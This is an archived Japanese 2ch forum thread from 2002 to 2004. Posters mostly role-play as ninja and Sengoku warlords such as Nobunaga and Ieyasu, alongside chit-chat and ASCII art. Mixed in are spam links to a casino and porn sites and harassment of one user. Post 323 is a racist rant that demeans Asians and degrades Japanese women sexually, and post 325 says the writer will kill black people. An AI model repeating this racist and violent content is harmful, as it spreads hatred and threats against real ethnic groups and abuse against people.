そうですね・・たしかにストレスが・・
影道回醒波とは・・?

228 :影道総帥@:02/09/09 06:51
人形師、殿、
仕事柄、精神疲労ものう。
あれは回醒覇だった。回醒覇は、致命的内外傷からの
回復をさせる事が出来る影道の奥義で、
私以外には使えんものじゃ。


229 :人形師:02/09/09 20:09
影道総帥@ 殿
自分が傷付いてみて、何かを得た様な気がします。
そういう何かが伝わるのでしょうか、
最近は悩みを打ち明けられる事が多いです。
回醒覇・・凄い技ですね・・・

230 :裕天寺 香 ◆hF0rmC.o :02/09/15 13:36
半蔵殿が来ませんね・・

231 :名無しさん@1周年:02/09/15 14:49
来るなよ頓珍漢

232 :裕香 ◆hF0rmC.o :02/09/15 15:31
なんだよ、頓珍漢って?


233 :名無しさん@1周年:02/09/15 15:45
お前だyo(藁

234 :裕香14歳 ◆hF0rmC.o :02/09/15 16:03
いつのひと?

235 :名無しさん@1周年:02/09/15 16:04
だからお前が頓珍漢なんだよ、裕香 ◆hF0rmC.o

236 :裕香14歳 ◆hF0rmC.o :02/09/15 16:06
レスあるのか? このヴォケ!
いつだっていってんだYO。

237 :名無しさん@1周年:02/09/15 16:07
プッ

238 :名無しさん@1周年:02/09/15 16:33
さすが14歳だ 頓珍漢の意味も知らないとは(w

239 :裕香14歳 ◆hF0rmC.o :02/09/15 17:49
おまえもしらんだろが・・

240 :名無しさん@1周年:02/09/15 17:53
だからお前みたいなのを頓珍漢て呼ぶんだよ

241 :名無しさん@1周年:02/09/15 20:02
>239

アフォ

242 :名無しさん@1周年:02/09/15 20:05
>>241 同意

243 :半蔵:02/09/15 20:55
裕香殿
お呼びですかな。

244 :幸村:02/09/15 23:57
頓珍漢は〜トンチンカン♪

245 :名無しさん@1周年:02/09/16 20:05
裕天寺香=裕香14歳=頓珍漢=☆=天狼星=桃子=◆Wind/D.k


246 :名無しさん@1周年:02/09/21 22:26
age

247 :人形師:02/09/25 22:00
寒くなって来ましたね。
風邪には気を付けて下さいよ。

248 :半蔵:02/10/01 00:54
まったくです。
忍びが風邪ひくと笑われますからなあ。

249 :人形師:02/10/02 01:12
台風は大丈夫でしたか?

250 :オデット ◆tkzDopp/x. :02/10/18 01:53
裕香
おやすみなさい。
眠い・・

251 :裕香14歳 ◆knhF0rmC.o :02/11/08 11:30
ただいまもどりました。
半蔵どの  人形師どの  オデット
・・わたし、かぜひいてました・・

252 :人形師:02/11/08 21:23
裕香殿
風邪ですか・・今は大丈夫なのですか?
半蔵殿はお元気かな?

253 :半蔵:02/11/09 19:48
元気でござる。

忍びは暑さ寒さに強う出来きてござれば・・・。

しばらく、六角の動きを探りに地下に潜ってござった。

くの一まで飛び出しましてのう、なかなか面白うござったわい。W

254 :人形師:02/11/09 23:49
お元気でしたか。
六角?

255 :果心居士:02/11/09 23:59
半蔵、こんなところに潜んでおったのか。




       けぶりの末か・・・
         フフ 次は逃がさん。

256 ::02/11/10 04:26
果心みっけ♪

妖力が足りぬ・・・

257 :百地丹波:02/11/10 21:16
果心居士よ 半蔵の首はまだか?

殿がお待ちである。

258 :名無しさん@1周年:02/11/11 22:55
???
どこかの板で壮絶な死闘が繰り広げられているみたいだよ。(ガクガクブルブル)
どこの板か教えれ!

259 :名無しさん@1周年:02/11/11 23:04
あほか。
忍びは姿を現さんのだ。

どこの板かどのスレか判らんよ。

260 :裕天寺 香 ◆knhF0rmC.o :02/11/12 00:55
半蔵殿
おお、元気で居られたか。
六角とな?

人形師殿
お元気で居られたかな?

私はある技の開発のため、水浴をしました。

261 :名無しさん@1周年:02/11/12 23:12
ここですか、基地外スレは?

262 :人形師:02/11/13 18:31
裕天寺 香 殿
元気ですよ。
水浴?
だめですよ、風邪をひきますからね。

263 :名無しさん@1周年:02/11/13 18:54
ffみdjんご???

264 :半蔵:02/11/14 00:09
しつこい奴らじゃのう。

しかし、百地三太夫が裏で糸を曳いておったとは・・・、
やはり黒幕は松永弾正か。

265 :名無しさん@1周年:02/11/14 00:14
半蔵様 ご無事でいらしたのですね。

よかった。

266 :名無しさん@1周年:02/11/14 00:34
いったい何が起こってんだYO!

267 :名無しさん@1周年:02/11/14 00:48
松永弾正=松永久秀

どこかで見かけたHNだが・・・。???

268 :名無しさん@1周年:02/11/14 01:00
つ、突っ込むの難しいスレでつね。(^^;

269 :アイオリアや:02/11/14 16:47
蔵人  陽の日、昼、蔵人六拾、風呂喪、受領せり。
有難や。非常に。密書なり。

半蔵殿、やはり、松が・・・?

270 :美少年戦士@シャカ:02/11/14 17:41
>>269 アイオリアや 殿
それは私への?

最近は頭痛や悪夢はどう?
寒くなり、あやつがいなくなって安心して過ごせるね。

天舞宝輪

271 :果心居士:02/11/15 01:20
姿など無きに等し。
言霊など発するに及ばず。

我が意により、森羅万象悉く我が手となり我が足とならん。

服部蔵人よ 我にはそなたの姿が見えておるぞ。

272 :名無しさん@1周年:02/11/15 01:22
不思議草子?

273 :名無しさん@1周年:02/11/15 01:23
わかりまへんw

274 :名無しさん@1周年:02/11/15 01:28
夜中に何言うとんねん?

275 :名無しさん@1周年:02/11/15 01:34
ヤパーリ基地外スレでつねw

276 :裕天寺 香 ◆knhF0rmC.o :02/11/16 13:06
>最近は頭痛や悪夢はどう?
ここ一年なくなったらしい。

277 :影道総帥@:02/11/20 02:40
ここも揚ってたのか・・・
息子の他にも奥義の使い手が居ると聞いたが・・・

278 :あ@1周年:02/11/20 03:21
朝じゃ、朝じゃっ、
久しぶりじゃ、久しぶりじゃっ!!
わっはっはっはっはっは・・・・

279 :果心居士:02/11/20 23:43
影道・・・・・。

まだ生きておったか。

280 ::02/11/21 23:17
果心みーつけた

281 :果心居士:02/11/24 01:24
環よ わしに何か用でもあるのか?

わしは今忙しいのだ。
多門城の殿がお待ちなのだ。

半蔵・・・何処へ消えた

282 :裕天寺 香 ◆knhF0rmC.o :02/11/24 03:36
ぎく・・

283 ::02/11/24 04:10
なんじゃ、恋人に向かって!

宝珠を返さぬか。

284 :半蔵:02/11/28 21:21
フフフ・・。

果心め 痴話喧嘩とは。

285 :秀吉:02/12/05 05:37
ホンとは僕が裏でいと引いてたのよ。
本能寺の変。ケケケッ・・・・

286 :お市:02/12/05 05:42
あ〜ら何言ってるのよ ひ・で・よ・し♪
あれは、あたしがあなたに指示だしたんじゃない。
あたしがいなきゃあんたは天下獲れてなかったのよ。
少しは感謝して欲しいわ。

287 :お市:02/12/05 05:42
ケッ、どうせ私は側室の子よ。

288 :いへやす:02/12/05 23:26
どはははは。
猿面冠者をそそのかしたのはこの駿府のおやじじゃよ。
ブヒヒヒヒヒヒヒヒヒヒヒヒーーーーーーッ!

289 :あ@1周年:02/12/11 04:37
そろそろ、いくかっ、
朝じゃ、朝じゃっ!!
わっはっはっはっはっは・・・・・・

290 :山崎渉:03/01/13 01:01
(^^)

291 :山崎渉:03/01/21 14:58
(^^)

292 :名無しさん@3周年:03/02/02 08:33
け・・・今朝方・・・
拙者は落武者になってしまった・・・

293 :お市:03/02/12 20:28
age

294 :名無しさん@3周年:03/02/13 00:59
ここはお市が何人も選手交代しているんだな

295 : ◆3X1b8VAs/E :03/03/03 10:35
何なんですか?このスレは?

296 :山崎渉:03/03/13 11:45
(^^)

297 :名無しさん@3周年:03/03/17 22:35
test

298 :裕天智 香 ◆knhF0rmC.o :03/03/20 17:20
>何なんですか?このスレは?
ふつうの磨れでしょう。たぶん・・


299 :名無しさん@3周年:03/03/20 20:59
☆★☆インペリアルカジノ☆★☆

〜信頼のGVGA加盟オンラインカジノ〜  
☆30ドル分のチップをプレゼント中!! 無料プレーも充実!!
 本場ラスベガスさながらのカジノゲームが遊べます!!   ・1996年創業 世界最大のオンラインカジノグループ
・200ヶ国から100万人を越すプレーヤー
・100%信頼できる安全性と厳密な機密保持
・世界中に向けて賞金発送
・16ヶ国語でカジノソフトウェアとカスタマーサービスをご提供
※禁止されている地域ではご利用いただけません。  
http://www14.vis.ne.jp/~gvga/imp


300 :名無しさん@3周年:03/03/20 22:15
西暦0年なんて存在しません。

301 :卑弥呼:03/04/17 01:08
ひみこのまんこ

302 ::03/04/17 11:38
>>300・・・ごめん、スレ立てた後に、すぐ気付いたんだけど。
もう訂正しようがなかったんでした。
いつか言われると思った・・・

303 :春風:03/04/17 15:06
ヒー間。気に摺るなよ。

304 :山崎渉:03/04/20 05:10
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

305 :名無しさん@3周年:03/05/05 23:28
そーでおじゃるか。ほぇほぇほぇ。

306 :名無しさん@3周年:03/05/07 15:04

   | ̄ ̄ ̄ ̄|
   |      |
   |      |
   |      |
   | __  |
   | ℃℃  |
   | ◯◯◯ |
   | ̄ ̄ ̄ ̄|
   |      |
   |      |
   |____|
  ‖

   ‖
   ‖

   ‖



307 :名無しさん@3周年:03/05/14 00:20
見るべし!
ttp://61.115.1.12/index.html

308 :山崎渉:03/05/22 01:02
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

309 :またも・・・カナダ牛がBSEに感染!!:03/05/22 01:10
http://bestranking.misty.ne.jp/gamble/enter.cgi?id=yami83


310 :山崎渉:03/05/28 16:04
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

311 :裕天智 香 ◆AldNwIE2j. :03/06/06 14:56
半蔵殿、人形師殿
お久でした。

「あずみ」が、映画化ですね。


312 :_:03/06/06 14:57
http://homepage.mac.com/hiroyuki43/jaz09.html

313 :人形師:03/06/06 21:17
裕天智殿、お久しぶりです。

裕天智殿は上戸彩がお好きかな?
金八**だとか、高校**だとか・・・


314 :裕天智 香 ◆AldNwIE2j. :03/06/06 23:34
人形師殿   まーまー
ですわ。

315 :名無しさん@3周年:03/07/09 17:46
     

316 :山崎 渉:03/07/12 16:37

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

317 :名無しさん@3周年:03/07/14 08:21
                             

318 :山崎 渉:03/07/15 12:09

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

319 :名無しさん@3周年:03/07/15 18:57
                              

320 :名無しさん@3周年:03/07/17 12:19
sage

321 :  アンレイン:03/07/22 13:03
講師、再婚しました!!
オデット以外と・・・
これで、すこしは安心できるかな。。。

オデット、これでわかったでしょう?
あなたなんて、はじめから相手にされてなかったってことが・・・

322 :  アンレイン:03/07/22 13:27
講師、21歳になったばっかりの人を選んだの。
25は、おばさんだっていってた。

でも、オデットはオカマだから、どっちみち、いやだってさ。

それと、オデットが送りつけてきた写真の人よりキレイダヨ。
講師の選んだ人のほうが、スタイルも良いし、
オデットって、オカマのくせに150cm台でしょ。
講師の選んだ人は、165だって。

323 :なまえをいれてください:03/07/22 13:33
ハッキリ言ってアメリカなどの多民族国家では黒人の方がアジア人よりもずっと立場は上だよ。
貧弱で弱弱しく、アグレッシブさに欠け、醜いアジア人は黒人のストレス解消のいい的。
黒人は有名スポーツ選手、ミュージシャンを多数輩出してるし、アジア人はかなり彼らに見下されている。
(黒人は白人には頭があがらないため日系料理天などの日本人店員相手に威張り散らしてストレス解消する。
また、日本女はすぐヤラせてくれる肉便器としてとおっている。
「○ドルでどうだ?(俺を買え)」と逆売春を持ちかける黒人男性も多い。)
彼らの見ていないところでこそこそ陰口しか叩けない日本人は滑稽。

324 :名無しさん@3周年:03/07/22 15:22
西暦444年

旧暦4月4日

4時44分

325 :名無しさん@3周年:03/07/22 15:23
黒人なんか殺してやる

326 :_:03/07/22 15:31
http://homepage.mac.com/hiroyuki44/hankaku06.html

327 :名無しさん@3周年:03/07/22 16:11
サンプルムービーだ
http://www.k-514.com/sample/sample.html
  _、_
( ,_ノ` )y━・~~~ 見たらどうだ・・・

328 : 裕香(14) ◆AldNwIE2j. :03/07/26 02:45
baka! やめなさい! ア***ン!

329 :  アンレイン:03/07/26 09:46
あたし、ここに書いてないじゃない!!
ホント、裕香の馬鹿!!

330 :cccc:03/07/26 10:12
おはよ!

妻子持ちの男を奪おうとするオデットは、
今度は別講師とケコーンするって!
本当か否か・・・?
回答求む>オデット

331 : 裕香(14) ◆AldNwIE2j. :03/07/27 02:09
だから、いいかげんにしなさいってのに・・

332 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 03:59
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

333 :裕天智 香 ◆AldNwIE2j. :03/08/11 14:42
半蔵殿、人形師殿は、いずこに・・

334 :半蔵:03/08/13 22:22
裕天智殿、最近ちと大人しゅうしておいでじゃな。(W
そうそう、奥州伊達の御城下で「おじさんA」なる御仁に逢いましたぞ。
貴殿のことを気にかけておいでじゃったが、お知り合いかの?

おお、大阪城が燃えておる。
某のお役目も終わり申した。
裕天智殿、もうお遭いすることも有りますまい。
達者で暮らされよ。

さらばでござる。




335 :人形師:03/08/14 01:08
半蔵殿、お元気で。

裕天智殿、別れは寂しいですね。

336 :山崎 渉:03/08/15 20:05
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

337 :猫ちゃん ◆0I0fr1AAi. :03/08/16 19:57
裕香ちゃん、いないのかな?
半蔵ちゃん、どこ行くの?

338 :名無しさん@3周年:03/08/16 20:50

タダで毎日、無修正動画サイトを見る裏技
http://tada-omanko.allday.at/

339 :名無しさん@3周年:03/11/12 03:10
test

340 :裕天智 香 ◆6Amhy3TVsE :03/12/09 02:50
猫ちゃん 殿    こんばんは。
半蔵殿いなくなったね。。

341 :猫ちゃん ◆JiNKcCKbOE :03/12/09 06:49
いなくなったね。。裕香ちゃんかなしい・・?

342 :第六天魔王:04/01/03 18:27
ほう・・余のために立てられたようなスレであるな。

しばらく逗留いたす。


343 :第六天魔王:04/01/04 12:09
うーむ、たれもおらぬのか?
さればまずは町づくりから始めねばならぬのう。
貞勝! 近郷より大工、石工、それに物売りも集めよ。



344 :猫ちゃん ◆JiNKcCKbOE :04/01/04 18:41
猫ちゃんはいるけど。。

345 :第六天魔王:04/01/04 19:05
おお、猫ちゃんか。
そちは・・・余の膝の上に居るがよい。
貞勝! 猫ちゃんに南蛮の菓子を持って参れ。

そろそろ町づくりが始まったようだのう。


346 :猫ちゃん ◆JiNKcCKbOE :04/01/04 22:14
お菓子ありがとにゃん ♪

町には どうぶつびょういん もできるかな?


347 :第六天魔王:04/01/05 21:50
貞勝! どうぶつびょういん とは如何なるものか早々に調べよ!


348 :第六天魔王:04/01/05 21:56
おお、早いのう貞勝。

なになに・・ふむふむ。
病に伏せたる生類を養生せしむる館であるか。

貞勝! 大工の棟梁に申し付けよ。
三日以内に どうぶつびょういん を築けとな。

349 :猫ちゃん ◆JiNKcCKbOE :04/01/06 18:50
明日にはできるかな??
優しい じゅういさん にしてね。

おなかいっぱい ☆

350 :第六天魔王:04/01/06 22:57
貞勝! 明日には完成させるよう檄を飛ばして参れ!

蘭丸! じゅうい とは何ぞ?
ふむ・・・
なるほど、早速近衛殿に頼んで御所より呼び寄せよ。
よいか、優しき者じゃぞ。



351 :猫ちゃん ◆JiNKcCKbOE :04/01/07 10:47
わ〜〜あれが どうぶつびょういん かなぁ?
近くで見てこよう〜☆

352 :第六天魔王:04/01/07 20:41
うーむ、でかしたぞ貞勝!
人足共を労うてやるがよい。
褒美も十分にとらせよ。

次か?
次はフロイスと約定致した通り、バテレン寺を建てるのじゃ。
縄張りは高山右近に任せてある。

おお、夕焼けが美しいのう。
のう、貞勝。


353 :猫ちゃん ◆JiNKcCKbOE :04/01/08 11:05
寒いノウ。

第六天魔王さま、ここはなんていう町 ?

354 :第六天魔王:04/01/08 21:15
うむ、この町の名は・・
平安楽土、略して「安土(あづち)」と申す。

貞勝! バテレン寺の方はどうじゃ?
そうか、急ぐように右近に申せ。

今宵は庚申待ちじゃ、ゆるりと飲むといたそう。
のう貞勝。



355 :猫ちゃん ◆JiNKcCKbOE :04/01/09 11:27
冷えるノゥ。

第六天魔王さまも賛美歌を歌うの? 主の祈りを唱えるの ?

356 :第六天魔王:04/01/10 17:48
いや、余は賛美歌は苦手じゃ。
「敦盛」は得意で時に謡うが・・、
祈りとは、デウスの神への祈りであるな。
余は神は信じぬ。
仏も信じぬ。
天国も地獄も有りはせぬ、死は全ての終わりを意味する。
死後は・・無である。

どれ、ひとさし舞うといたそう。

人間五十年 下天のうちをくらぶれば〜♪

ははは、ちと酔いがまわったかのう。
 

357 :猫ちゃん ◆JiNKcCKbOE :04/01/11 10:54
じゃあ、幽霊もいない?
幽霊こわいにゃん。

358 :第六天魔王:04/01/11 18:34
はっはっは、幽霊などこの世にはおらぬ。
怖いと思う心が無いものを見せるのである。
人は誰しも死を怖れる。
それ故、死に関わるあらゆることどもを怖れ忌み嫌うのである。
また、人が死を怖れる理由のひとつには、
死後が「無」であることがあげられよう。
人は「無」になることを怖れておるのだ。
死後も何事かあらんことを願っておるのだ。
それで、極楽や天国なる世界を作り出したのである。

幽霊など存在せぬから恐れることはないぞ。

359 :第六天魔王:04/01/15 00:33
出来たようだな貞勝!
右近を呼べ右近を。



360 :猫ちゃん ◆JiNKcCKbOE :04/01/15 22:38
こんばんわ。
はい、おみやげの お魚とサザエにゃん。
海に潜って採ってきたの。

ばてれん寺の次は何を造るの ?

361 :第六天魔王:04/01/15 23:22
これはありがたい。
サザエは大好物である。
つぶ貝やニシ貝も好きじゃなあ。
アワビが最も好物であるが、値が高い!
余は どうぶつびょういん や バテレン寺 の造作で銭が不足しておるから
高いアワビは食せぬのである。
少し小ぶりじゃが、トコブシで我慢すべし。

猫ちゃんは潜りができるのか?
この季節、海は冷たかろうに・・・。

ご苦労であったの。

362 :猫ちゃん ◆JiNKcCKbOE :04/01/17 22:31
>猫ちゃんは潜りができるのか?
あい、できます。今度は あわび を採ってくるにャん。
どこにいるのかな・・・ ?

363 :第六天魔王:04/01/19 22:46
アワビ、楽しみだのう。
造りもうまいが、余はバター焼きが一番の好物じゃ。

なに! 松永久秀が謀反じゃと? おのれ糞爺いめ!
秀吉! 行ってあの白髪ッ首はねて参れ!
ただし、奴の持つ「平蜘蛛の茶釜」は無傷で持ち帰るのじゃぞ、よいか!





364 :猫ちゃん ◆JiNKcCKbOE :04/01/20 17:33
風邪ひいたみたい・・・。

いたいいたいのケンカはダメにゃん。

365 :名無しさん@3周年:04/01/21 23:37
戦が長引いてるみたい・・。

366 :名無しさん@3周年:04/01/22 09:36
やっぱり・・。

367 :名無しさん@3周年:04/01/22 09:38
しつこいんだよ
思い込みもいいとこだしぃー

368 :第六天魔王:04/02/04 21:56
くっそー、平蜘蛛割っちまいやがんの。

秀吉! 荒木村重と合うて参れ!
帰りに逢坂のたこ政でタコ焼きを買うのを忘れずにの。

369 :猫ちゃん ◆JiNKcCKbOE :04/02/04 23:04
TIWAv
MADA MADA SAMUINOU?
わーい、タコ焼き♪あ、かな出た、、、

370 :第六天魔王:04/02/05 22:10
ん? カナが出なかったのか?w

たこ政のタコ焼きは余も食したことがないのじゃが、美味いと評判である。
秀吉が買うて参ったら猫ちゃんにも馳走いたすとしよう。

おお、今宵は星が美しい。
しかし、冷えるのう。

371 :猫ちゃん ◆JiNKcCKbOE :04/02/05 22:57
タコ焼き、楽しみ楽しみ♪
かな 時々でないのにゃん。

猫ちゃんも夜お外に散歩行った時 お空を観るの。
星がいっぱいあるの。
ご主人さまがお星さまに懐中電灯を向けて息をフ〜〜って
すると、白いのがお空に昇ってゆくの。

372 :第六天魔王:04/02/06 21:40
ほほう、それはさぞや幻想的な光景であろうのう。
だが、近頃はよう冷える故、夜の散歩は風邪をひかぬようにの。

おお、秀吉が参ったか。
構わぬ、通せ。

よう参った、サル。
なに! タコヤキを忘れただと! このたわけが。w
猫ちゃんよ、秀吉はトンだ大うつけよ。
タコヤキはまたの機会にしてくれい。

ところで播磨の方はどうじゃ?
ふむふむ・・。
で、あるか。

373 :猫ちゃん ◆JiNKcCKbOE :04/02/07 18:04
猫ちゃんが寒い時は暖かい布をかけてくれます。
お外寒いのに我慢して付いてきてくれます…。
毎日おいしい刺身を食べさせてくれます…。
猫ちゃんの為なら何でもしてくれます…。
もっと…ずっとずっと一緒にいたい…。


374 :第六天魔王:04/02/10 00:30
・・・うらやまぴいのう。

あつあつじゃのう。


秀吉! 早う播磨を平定いたせ!
余は吉乃が恋しゅうなった。
早う帰りたいのじゃ。 

375 :猫ちゃん ◆JiNKcCKbOE :04/02/10 11:18
でも猫ちゃんはお母ちゃんの方がすきなの。
昨日も一緒に寝んねしてもらったの。
お父ちゃんは猫ちゃんの為にお仕事の帰りに
遠回りして大好きなタコを探してきてくれた。
美味しくていっぱい食べた。
おねえちゃんは、猫ちゃん見て泣くの…。

早く吉乃に帰るのにゃん…。

376 :裕天智 香 ◆AldNwIE2j. :04/03/07 08:10
第六天魔王どの、    はじめまして。

猫ちゃん、     おひさ。。さむいね。

377 :猫ちゃん ◆JiNKcCKbOE :04/03/08 23:45
そう?

もうすぐ裕香ちゃんの誕生日ねー。

378 :裕天智 香 ◆AldNwIE2j. :04/03/10 20:39
裕香ちゃんの? そのようですわね。猫ちゃんのは?

暖かくなってきたね?

379 :猫ちゃん ◆JiNKcCKbOE :04/03/11 00:07
猫ちゃんのは9ヵ月後。

うん。

380 :裕天智 香 ◆AldNwIE2j. :04/03/11 13:38
昨日は暖かだったのに、今日は暗い雨。明るさが。電気つけなきゃ。。

381 :茶屋四郎二郎:04/03/11 22:54
裕天寺殿
第六天魔王様は先日京の本能寺で惟任日向守の軍勢に襲われ、
御生涯あそばされましてございます。
尚、二条城におられた御嫡男右大臣様も討ち死なさいました。
家康殿は半蔵殿の先導で伊賀を越え、無事三河へご到着との事でございます。

382 :猫ちゃん ◆JiNKcCKbOE :04/03/11 23:39
きょうはちょっと寒かった。。

383 :裕天智 香 ◆AldNwIE2j. :04/03/12 22:53
こっちもそうだったね。。

茶屋四郎二郎 殿
よくはわかりませんが、無事到着おめでたうござります。

384 :猫ちゃん ◆JiNKcCKbOE :04/03/12 23:12
さむいさむい。

385 :裕天智 香 ◆AldNwIE2j. :04/03/13 18:13
今日は天気も良く、暖かだったよ。びたみん剤飲んだ。

386 :猫ちゃん ◆JiNKcCKbOE :04/03/14 00:32
よかったよかった。

387 :裕天智 香:04/03/16 11:50
第六天魔王どのが、来ないね・・
いい天気・・

388 :名無しさん@3周年:04/03/16 12:08
何やってんの、おまいら?

389 :仔猫ちゃん ◆JiNKcCKbOE :04/03/16 12:44
香ちゃん、第六天魔王ちゃまは死んじゃったみたい。?
猫ちゃんのお兄ちゃんと一緒にいると良いわにゃ。

390 :裕天智 香 ◆AldNwIE2j. :04/03/19 11:55
第六天魔王どのが・・・!?
いい天気・・

391 :仔猫ちゃん ◆JiNKcCKbOE :04/03/19 12:48
なんかそんなようなことかいてにゃい?

392 :るるちゃん ◆ZTcO4A0DTE :04/03/19 13:46
第六天魔王どの?
こんにちわ。
猫ちゃんと仔猫ちゃんのとリップ同じだけど・・・?

裕天智 香 ゃん、とってもおいしい名産をお送りしますね。

393 :裕天智 香 ◆AldNwIE2j. :04/03/21 03:44
そういえば、そんなこと書いてあったような・・

394 :るるちゃん ◆IqUFE6knsU :04/03/21 04:07
裕天智 香 殿  どこにも書いてないわよ。騙されないでネ・・

395 :るるちゃん ◆IqUFE6knsU :04/03/21 04:22
仔猫ちゃん
ちゃんにも言っとくけど、適当な事を書いて他人を騙すのはやめなさい。
それとウソが多いわね。最低よ。まるでオ●ットみたいよ。

396 :るるちゃん ◆IqUFE6knsU :04/03/21 04:26
「猫」という字が抜けたようね。↓に正しく書いておくわ。

仔猫ちゃん
猫ちゃんにも言っとくけど、適当な事を書いて他人を騙すのはやめなさい。
それとウソが多いわね。最低よ。まるでオ●ットみたいよ。

397 :肉刺乃呼撥 ◆ajJx8bJOuk :04/03/21 16:07
おはつでございます。
仲間割れでございますかな?

398 :名無しさん@3周年:04/03/21 16:16
おい! 美容板の乳スレに女神が降臨したぞ!! 

【あなたのおっぱい評価しますPART.6】
http://life3.2ch.net/test/read.cgi/diet/1079546071/
ここの447タソがついにブラ外してチクビ晒し中。
形のイイお椀型、ベージュピンクのティクビだ!!
勃起必至。急げ!


399 ::04/03/21 16:25
うそつけ・・・>>398  苦情の山だぞw

400 :名無しさん@3周年:04/03/21 19:09
>>394
おまえ、日本語がわからんのか?

381で茶屋が「第六天魔王は死んだ」と書いているじゃないか。
389はそのことを言ってるんだよ。
小学校からやり直し!
ニキビの話題など振ってる暇があったら、勉強しなさい。


401 :るるちゃん ◆ZTcO4A0DTE :04/03/21 21:18
うわぁ〜〜〜!だれなのよっ!!
るるの偽者めぇ!!

402 :るるちゃん ◆ZTcO4A0DTE :04/03/21 21:19
るるちゃんのトリップはコレよっ!!

403 :わい・わい:04/03/22 00:51
おはつです 御晩です  るるちゃん、怒ってると肌に良くないわよ

404 :わい・わい:04/03/22 09:17
おはよう!!
るるちゃん、いる?

405 :仔猫ちゃん ◆JiNKcCKbOE :04/03/24 14:13
400、ありがとにゃんー。

406 :裕天智 香 ◆AldNwIE2j. :04/03/24 22:07
ただいま戻りました。清少納言さんのことは先ほど聞きました。

407 :若菜:04/03/25 13:14
えっち・・

408 :るるちゃん ◆ZTcO4A0DTE :04/03/25 14:38
裕天智 香 さん   私も聞きました・・・ビックリよね・・・
          でも、そういう意外な一面を知る事が出来て嬉しかったわ。

若菜 さん   えっち・・ってなにが?

409 :若菜:04/03/26 01:25
ここね。清少納言さんの・・。

410 :るるちゃん ◆ZTcO4A0DTE :04/03/26 02:48
そう、ここよ。
で、えっち・・・ってなにが?

411 :若菜:04/03/26 06:58
だからセイショウナゴンノ事だっていってるじゃない。


412 :るるちゃん ◆ZTcO4A0DTE :04/03/26 14:14
どうしてえっちだとおもうの?

413 :雑賀衆:04/03/26 18:20
あー、あれか?
明智の軍勢に紛れて撃ってみたけどよ、
距離有りすぎてあたんなかったわ、はは
仲間の敵討ちはできんかったが‥
まぁ結果オーライって所か。
さーて、今度はどこに雇って貰うかねぇ。

414 :徳川家康ヤス:04/03/26 19:43
じゃあ余の所にくるかの?孫一はどうしたかの?

415 :雑賀衆:04/03/26 21:37
親方?
ああ、羽柴殿に恩売っとくって言ってすっ飛んでった。
相手は明智殿だ。
ま、近いし間に合うかな。
あ、もしよろしければ徳川殿の事、親分に話ときやすが?

416 :徳川家康ヤス:04/03/27 12:45
では、話しておいてくれるかの?
ほほう・・・秀吉に・・・

417 :雑賀衆:04/03/29 21:15
へい…
承ります…
しかし一兵卒のわたしの言葉に耳傾けてくださるとは、徳川殿‥‥
いや、様と呼ばせていただきます。
徳川様 、おそらくこれからが
ちょいとやっかいなことになるかも知れませんぜ?
信長のやろ‥いえ信長公の後の引継の問題っすよ。

418 :本多マゾ:04/03/30 00:03
殿、ここは高見の見物と参りましょうぞ。
そのうち内部崩壊いたしたところをば・・
・・これ雑賀の者、ただ今のこと、他言は無用ぞ。


419 :雑賀衆:04/03/31 01:46
>>418
へい、あっしは何も聞かなかったて事で。
ついでながら跡目問題のあっしの私見なんですがね、
明智殿、羽柴殿どちらが勝つにしろ、柴田殿筆頭とする武闘派が黙っていないでしょうよ。
勝った方を潰しにかかろうとするでしょうね。
んで、その後は、徳川様にも火の粉が降り懸かる事になるかもしれやせんぜ?

420 :徳川家康ヤス:04/04/01 16:07
雑賀殿、本多殿
うむ!ご心配かたじけない。天海和尚もおるしの。

421 :徳川家康ヤス:04/04/01 16:18
ところで、話題は変わるが、
最近は、けいわん、なる武道が流行っておるものですかの?
偉人などを和蘭などから呼んだりして。

422 :雑賀衆:04/04/02 02:27
>>421
家康様、
えーと、あのバテレンの力自慢とわれらが日の元の国の猛者達が
素手でくんずほぐれず戦うあれですな。
へたな田舎相撲より豪快ですな、あれは。

423 :高級猫ちゃん ◆JiNKcCKbOE :04/04/02 16:30
鳩ぽっぽはまだかな…?

きょうは どうぶつびょういん にゆく日にゃん〜〜

424 :柚李:04/04/03 01:36
何が高級よ!!さいてい・・トリップ結局同じだし、どうせオデットが化けた
馬鹿なんでしょう?

425 :徳川家康ヤス:04/04/03 01:43
雑賀殿、
うむ!それもわれらが日の元の国国技、相撲の面目をかけて、曙という異人が、
けいわんの武蔵と戦ったという。何たる事か。

426 :徳川家康ヤス:04/04/03 19:20
うむ!その前には、つまり大晦日には、同じ異人のぼぶ・さっぷとやらと戦って負けた。
それで相撲界の面目をも背負うことになった。ぼぶ・さっぷとやらは如何なものかの?

427 :きりすと ◆t/lN.9glVw :04/04/04 19:01
平和に行きましょうぞ。我 争いを好まず 我 平和を愛す。

428 :青鴉:04/04/04 19:14
こんばんわ。

429 :きりすと ◆t/lN.9glVw :04/04/04 19:24
青鴉さん こんばんは。
今は、こち亀を観ながらのカキコデスマス。
あのスレの話は、どういうことになってるのでしょう?

430 :本多マゾ:04/04/04 19:40
>>419(雑賀衆)
我が徳川家にも火の粉がのう・・。
ふふ、その時こそ三河軍団の強さを天下に示すときじゃ。

ただのう・・わが殿家康は、この正信のことを「本多殿」などと言うておいでじゃ。w
昨日、鷹狩の最中に転んで頭をお打ちになったでのう・・。

431 :徳川家康ヤス:04/04/22 15:26
わはは、そうじゃったか、あたまをのう…
んで、ぼぶ・さっぷとやらの件は…?

432 ::04/04/23 20:19
西暦か・・・だれかいないかな。。。

433 :雑賀衆:04/04/28 15:37
↑撃っていいか?
家康様?

434 :徳川家康ヤス:04/05/09 00:35
